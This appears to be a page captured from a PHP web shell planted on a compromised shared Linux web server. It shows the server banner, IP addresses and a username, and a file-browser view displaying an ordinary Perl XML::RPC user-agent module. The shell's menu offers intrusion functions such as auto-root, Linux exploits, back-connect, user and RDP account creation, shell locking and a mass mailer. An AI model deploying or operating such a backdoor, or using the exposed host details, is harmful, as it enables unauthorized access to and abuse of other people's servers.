Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
XML /
RPC /
[ HOME SHELL ]
Name
Size
Permission
Action
Enc
[ DIR ]
drwxr-xr-x
UA
[ DIR ]
drwxr-xr-x
Enc.pm
3.56
KB
-rw-r--r--
Fast.pm
12.14
KB
-rw-r--r--
README.pod
6.67
KB
-rw-r--r--
UA.pm
1.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UA.pm
package XML::RPC::UA; =head1 NAME XML::RPC::UA - Base class for XML::RPC UserAgent =head1 SYNOPSIS Generic usage use XML::RPC::Fast; my $client = XML::RPC::Fast->new( $uri, ua => XML::RPC::UA::LWP->new( timeout => 10, ua => 'YourApp/0.01', # default User-Agent http-header ), ); =cut use strict; use warnings; use Carp; # Base class for encoders use XML::RPC::Fast (); our $VERSION = $XML::RPC::Fast::VERSION; =head1 METHODS The following methods should be implemented =cut =head2 async () Should return true, if useragent is asyncronous, false otherwise =cut sub async { 0 } =head2 call ( $method, $uri, body => $body, headers => { http-headers }, cb => $cb->( $response ) ); Should process HTTP-request to C<$uri>, using C<$method>, passing C<$headers> and C<$body>, receive response, and invoke $cb with HTTP::Response object =cut sub call { my ($self, $method, $url, %args) = @_; $args{cb} or croak "cb required for useragent"; # ... #$args{cb}( HTTP::Response->new() ); return; } =head1 COPYRIGHT & LICENSE Copyright (c) 2008-2009 Mons Anderson. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =head1 AUTHOR Mons Anderson, C<< <mons@cpan.org> >> =cut 1;
Close